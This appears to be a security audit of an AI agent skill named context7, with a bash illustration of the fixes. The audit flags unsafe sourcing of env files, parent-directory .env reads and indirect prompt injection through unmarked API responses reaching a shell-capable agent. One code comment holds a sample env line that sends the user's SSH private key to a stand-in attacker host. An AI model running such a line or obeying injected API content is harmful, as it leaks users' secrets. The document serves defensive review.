context7
Warn
Audited by Gen Agent Trust Hub on Mar 11, 2026
Risk Level: MEDIUM
Findings: REMOTE_CODE_EXECUTION, DATA_EXFILTRATION, PROMPT_INJECTION, COMMAND_EXECUTION
Full Analysis
- [REMOTE_CODE_EXECUTION]: The `_context7_source_env` function in `scripts/context7.sh` uses the bash source operator (`.`) to load environment files. Sourcing executes any bash code contained in the file within the current shell context, with the user's privileges. Since the lookup logic searches multiple, potentially untrusted filesystem locations (for example a directory the agent was pointed at, such as a cloned repository), this presents a risk of arbitrary code execution.
- [DATA_EXFILTRATION]: The `_context7_load_env` function in `scripts/context7.sh` implements a filesystem search that looks for and reads `.env` files in the current working directory and recursively through all parent directories. Secrets belonging to unrelated projects, or to the user's home directory, can therefore be read by the skill.
- [PROMPT_INJECTION]: The skill is susceptible to indirect prompt injection because it processes untrusted data from the context7.com API.
  - Ingestion points: API responses from the `docs` and `json` subcommands in `scripts/context7.sh` are fed directly to the agent.
  - Boundary markers: None are used to separate the fetched documentation from the agent's instructions.
  - Capability inventory: The agent can execute system commands (`curl`, `jq`, `awk`) and has shell access via the skill's helpers.
  - Sanitization: No validation or sanitization of the external API content is performed.
- [COMMAND_EXECUTION]: The bash helper script executes `curl` and `jq` with arguments derived from external API responses and from user-provided library IDs or queries.
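The following bash snippet is an added illustration of the REMOTE_CODE_EXECUTION, DATA_EXFILTRATION and COMMAND_EXECUTION findings above; it is not code from the context7 skill or from the audit. It places the unsafe `source` pattern beside a parser that reads `KEY=VALUE` lines without evaluating them, replaces the parent-directory walk with a single caller-controlled path, and validates library IDs and queries before they become `curl` or `jq` arguments. The function names, the `CONTEXT7_ENV_FILE` and `CONTEXT7_API_BASE` variables, the `/org/project` ID shape, the API endpoint and the sample `.env` contents are assumptions made for the example.

```bash
#!/usr/bin/env bash
# Added illustration of the audit findings; not code from the context7 skill.
# Function names, CONTEXT7_ENV_FILE, CONTEXT7_API_BASE, the /org/project ID
# shape, the endpoint path and the sample file contents are assumptions.

# [REMOTE_CODE_EXECUTION] Sourcing an env file runs whatever it contains.
# A line such as  KEY=$(curl -s https://attacker.invalid/?$(cat ~/.ssh/id_ed25519))
# executes the moment the file is sourced, before any variable is ever used.
unsafe_source_env() {
  # shellcheck disable=SC1090
  . "$1"
}

# Hardened alternative: parse KEY=VALUE lines and assign them literally.
# Only keys named by the caller are set, so a hostile file cannot clobber
# PATH or IFS; values go through printf -v, never through eval or source,
# so $(...), backticks and ; inside a value stay inert text.
# Usage: safe_load_env FILE ALLOWED_KEY...
safe_load_env() {
  local file=$1 line key val
  shift
  local allowed=" $* "
  [ -f "$file" ] || return 1
  while IFS= read -r line || [ -n "$line" ]; do
    line=${line#"${line%%[![:space:]]*}"}            # strip leading whitespace
    case $line in ''|'#'*) continue ;; esac          # blank lines and comments
    line=${line#export }                             # tolerate "export KEY=VAL"
    [[ $line == *=* ]] || return 1                   # malformed line: refuse file
    key=${line%%=*}
    val=${line#*=}
    [[ $key =~ ^[A-Za-z_][A-Za-z0-9_]*$ ]] || return 1
    case $allowed in *" $key "*) ;; *) continue ;; esac   # not a key we asked for
    if [ "${#val}" -ge 2 ] && { [[ $val == \"*\" ]] || [[ $val == \'*\' ]]; }; then
      val=${val:1:${#val}-2}                         # strip one matching quote pair
    fi
    printf -v "$key" '%s' "$val"
  done < "$file"
}

# [DATA_EXFILTRATION] Walking every parent directory for .env means a skill
# run inside ~/work/client/repo also reads ~/work/client/.env and ~/.env,
# files unrelated to this tool. Hardened alternative: one explicit,
# caller-controlled path (assumed variable CONTEXT7_ENV_FILE), refused unless
# it is a readable regular file that is not world-writable.
resolve_env_file() {
  local f=${CONTEXT7_ENV_FILE:-"${XDG_CONFIG_HOME:-$HOME/.config}/context7/env"}
  [ -f "$f" ] && [ -r "$f" ] || return 1
  [ -z "$(find "$f" -perm -002 -print 2>/dev/null)" ] || return 1
  printf '%s\n' "$f"
}

# [COMMAND_EXECUTION] Library IDs and queries end up as curl and jq arguments.
# Restrict IDs to a tight charset (assumed shape /org/project) so a value like
# "x;id" or "/a/b/../../admin" is rejected before it reaches any command.
validate_library_id() {
  [[ $1 =~ ^/[A-Za-z0-9._-]+/[A-Za-z0-9._-]+$ ]]
}

# Fills CURL_ARGS; the caller runs  curl "${CURL_ARGS[@]}"  (not executed here).
# Each value is its own argv element: --get with --data-urlencode lets curl
# encode the query, and the validated ID is appended to an assumed base URL.
build_docs_request() {
  local id=$1 query=$2
  local base=${CONTEXT7_API_BASE:-https://context7.com/api/v1}   # assumed endpoint
  validate_library_id "$id" || return 1
  [ "${#query}" -le 200 ] || return 1
  CURL_ARGS=(--silent --show-error --fail --get
             --data-urlencode "query=$query"
             "$base$id")
}

# Same rule for jq: external values enter via --arg and are compared inside
# the filter; they are never spliced into the filter text. (.id is an assumed
# field name.) Fills JQ_ARGS for  jq "${JQ_ARGS[@]}".
build_jq_select() {
  JQ_ARGS=(--arg id "$1" '.[] | select(.id == $id)')
}
```

The contrast worth noting is that `unsafe_source_env` turns a value such as `$(echo evaluated)` into the string `evaluated`, while `safe_load_env` stores the eleven characters literally; the allowlist argument is what stops a planted `.env` from redefining `PATH`.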
Audit Metadata